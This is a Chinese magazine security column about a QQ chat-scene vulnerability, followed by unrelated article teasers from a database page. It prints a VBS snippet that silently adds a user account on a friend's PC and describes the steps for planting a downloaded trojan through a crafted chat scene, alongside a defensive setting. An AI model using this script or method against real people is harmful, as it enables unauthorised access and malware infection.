QQ聊天场景美 漏洞害人早预防

来源 :计算机应用文摘 | 被引量 : 0次 | 上传用户:lxmcn
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  最近,武汉的热心读者薛义辉给我们“黑客战线”栏目来信写道:“最近听说有个QQ聊天场景漏洞,传播木马很厉害,蛮吓人的,但我在用QQ时没有碰到过,贵栏目可否给我们介绍一下……”
  其实,这个QQ聊天场景漏洞出现有一些时间了,虽然到现在为止它并没有如一些媒体预言的那样会给大家带来血雨腥风,但其潜在的危害确实值得我们注意。应这位热心读者的要求,本期“黑客战线”就向大家剖析它!同时,也希望大家在安全方面有什么疑问、有什么难题,都给我们来信(邮箱:pcd2safely@gmail.com),我们会尽最大力量解决它,谢谢!
  QQ的安全—直是叫大家头痛的问题。这不,前不久曝光的一个QQ聊天场景漏洞,就让不少QQ用户对QQ那漂亮的聊天场景心生是惧。毕竟,谁也不想自己的电脑被黑客控制。
  
  恶作剧——漏洞小试
  
  这个漏洞是怎么被黑客利用的?下面我们先试验一下。运行《黑鹰QQ场景漏洞利用工具》,在其“QQ路径”中设置QQ的安装目录,接着在“VBS脚本”中设置脚本代码。此工具自带一段脚本代码,我们完全可以直接使用它。但是为了让该场景可以“为我所用”,还是对部分代码进行一些修改。
  在代码最后找到MsgBox这个消息函数。它最后的括号里是场景脚本在执行后弹出的窗口信息文字。我们将此括号内的文字改变功能,如下这段代码的作用是在Q友的电脑中添加一个名为pcd的用户。
  dim objshell
  set objshell=wscript.createOBject(“wscript shell”)
  iReturn=obishell.Run(“net user pcd pcd/add”,O,TRUE)
  设置完成后点击“写入”按钮,这样一个名为“QQODAY场景”的聊天场景就写入到你的QQ目录中。现在任找一个Q友,点击聊天窗口工具栏里的“选择聊天场景”按钮,在弹出的窗口中点选“我的场景”标签,然后在其中找到这个名为“QQODAY场景”的聊天场景。当选择并执行这个聊天场景后,它会先自动下载到这个Q友的电脑中,接着自动执行场景中的脚本代码,添加一个名为pcd的用户。
  
  种木马——真实目的
  
  刚才只是小试牛刀,黑客的最终目的是控制我们的电脑,因此他们会进一步利用这个漏洞。刚刚提到过的VBS脚本代码,就能帮黑客把木马病毒文件从网上悄悄下载到我们的电脑中,从而控制我们的电脑。下面来看看这是如何实现的。
  首先,运行脚本生成器Script Dowmloader。然后在其“木马网址”中填入木马病毒的在线链接,在“保存路径”中设置下载到本地的路径(根据自己需要来选择“加密的VBS”或“未加密的VBS”)。最后,点击“生成”按钮即可生成恶意脚本文件。这样的恶意脚本文件容量不到2KB,可以说是短小精悍,使用方便。
  用“记事本”分别打开恶意脚本文件和场景目录中的VBScript.qqs文件。复制恶意脚本文件中的所有代码,替换掉VBScript.qqs文件中MsgBox这部分代码,然后保存。现在按照开始讲过的方法,将修改后的恶意聊天场景发给QQ友。当其QQ收到这个恶意聊天场景后,其电脑就会被木马“攻陷”,成为黑客手中的猎物。
  
  巧设置——QQ防护
  
  正所谓:多行不义必自毙。当黑客在给别人发送聊天场景的时候,该场景也会同时在自己的系统中运行。不过黑客那边的事儿我们管不了,我们管好自已的QQ就是了。
  首先,在QQ聊天窗口中点击工具栏上的“选择聊天场景”按钮。然后,在“我的场景”标签中点击“我的场景设置”链接,把弹出窗口里的“接受场景邀请”前面的钩去掉就可以啦!当然,现在还有好几种手工或利用安全软件来进行防护的方法,但限于篇幅在此就只介绍这种最简单的方法了。
  编后语:由于此漏洞的利用十分简单,是菜鸟黑客的最爱,所以为了避免无辜者受害,我们就不提供文中相关工具的下载了,抱歉!
其他文献
音乐连通你我,快乐聆听生活。音乐就如同  一杯纯美的佳酿。让人陶醉。在每一个快乐的、伤心的、繁忙的、悠闲的日子里,我们总是会让音乐伴随在左右。搜索音乐,下载音乐、聆听音乐已经成为我们生活的重要组成部分。很多时候我们总是会为某首歌曲百寻不着而懊恼,为音乐下载链接出现“死链”而焦急。那么。究竟哪一款音乐搜索下载软件,才是最好的呢?    出老师未捷声先死,下载安装便搁浅    毋庸置疑,Vista时代
必须承认,多数学生对语文学习缺乏兴趣。作为一线语文教师,应该反思劳而无获的根源所在。教师讲、学生记,教师霸道地横亘在文本与学生之间,剥夺至少影响了学生和文本之间直接对话的权利,这是阅读教学长期“高耗低效”的主因。鉴于此,我思考和实践的是:阅读,让语文课柔软起来。  一、多样朗读夯基础  新课标把朗读放在阅读教学中极其重要的位置上,“教学千法读为本”。阅读教学中,学生在读中品悟,注于目,出于口,闻于
在Windows玩家之中,现在最流行的竟然不是微软官方发售的WinXP安装光盘,而是各种经过定制、改造的winXP,其中深度DeepinXP,番茄花园WinXP、电脑公司特别版、雨林木风版各具特色。本刊在2007年47月上刊对这些改版WinXP进行过深度报道后,接到很多读者来信,表示感谢之余,不少朋友还咨询这些光盘的制作方法。为了满足大家的好奇之心,我们专门邀请了资深改版WinXP制作高手(权且以
QQ秀真是个好东西。它可以让我们展示自己的个性,也能让冰冷的文字聊天变得更加温馨、真实。当然,如果它是免费的。那就更好了……虽然现在腾讯在QQ秀网站上已经没有提供免费的道具了,不过,我们还可以通过其他的途径,来获得不花钱的QQ秀。    “顶”出来的QQ秀    “幸运碰撞”是腾讯官方推出的有奖活动,大家只需玩一个顶蘑菇的小游戏,就有机会获得免费的QQ秀道具。  访问http://qqshon.q
【摘 要】面对八年级学生教学《虽有嘉肴》,以读为经,以解读文本为纬,四轮朗读,拾级而上。通过读准读熟,得文本解读之基;读出节奏,得语言形式之美;见微知著,得谆谆教诲之情;变化结构读,得文本之理,从而达到“得他滋味”。  【关键词】文言文;朗读;教学策略  【中图分类号】G633.3 【文献标志码】A 【文章编号】1005-6009(2020)51-0033-03  【作者简介】梁增红,江苏省常州市
友情提醒:在阅读正文前请准备餐巾纸一张,否则,口水滴到书上我可不负责。  又到国庆长假,又要准备出门游山玩水一番,同时,也又得为出门时携带哪些装备而烦恼。  路上肯定要听歌,MP3少不了;嗯,看看视频应该也不错,那么,MP4也带上吧;作为一名准摄影爱好者,背包里自然也不能少了数码相机的位置;女友说视频比照片更生动,嗨,数码摄像机也背上吧……    MP4手表本来就足够吸引眼球了,而Brando推出
因为出色的歌词功能,《千千静听》成为了许多电脑玩家不可缺少的音乐播放器。其新近推出的5.0版(下载地址:http://www.ttpIayer.com),虽然整体没有太大的改变,但却在个性化功能上下足了功夫,带给我们更加丰富多彩的音乐体验。    为歌曲开辟VIP通道    在播放歌曲时,如果在播放列表中新添加了歌曲,这首歌曲会自动排列在播放列表的最下方。如果希望在播放完当前歌曲后自动播放新添加的
WinXP虽然好用,但还是有很多不尽完美之处,所以不少朋友在安装系统后,都要另行安装自己中意的各种软件。你不知道该如何选择?没有关系。我们邀请超级电脑发烧友Aoouch@cnbeta和Woodmaster,为我们展示他们的工具箱……    Aoouch@cnbeta  作为一个玩电脑已经7年多的超级发烧友,Aoouch@cnbeta使用过的软件绝对算得上车载斗量。更何况,他还是一个喜欢尝鲜,不放过
首先,我要非常诚恳地告诉大家,我不是一个只看重外表的人,我也不是一个只看重画面的游或玩家。  但是!总会有那么一些意外:有些人美得让你根本不会去考虑她姓啥,名啥,从哪儿来,到哪儿去,家住几口人,家有几亩地;有些游戏,画面真实得让你一看就立即融入游戏的世界中,你无暇考虑它是否好玩,甚至忘记去研究它到底怎么玩。  这次要为大家介绍和展示的两软游戏,正是这样的“意外”。并不是说它们不好玩,而是它们的“靓
如今越来越多的公司需要使用PowerPoint来展示产品或演示策划方案,但有时候系统没有安装PowerPoint,如何应急给客户做介绍呢?其实只要有网络.我们同样可以在线演示PPT。SlideShare网站(http://www.slideshare.net)感觉跟YouTube很像.只不过它专门提供上传,展示PPT或者PDF文件(单个文件限制在30MB以下)的服务。同样是秀内容,而且也都支持网站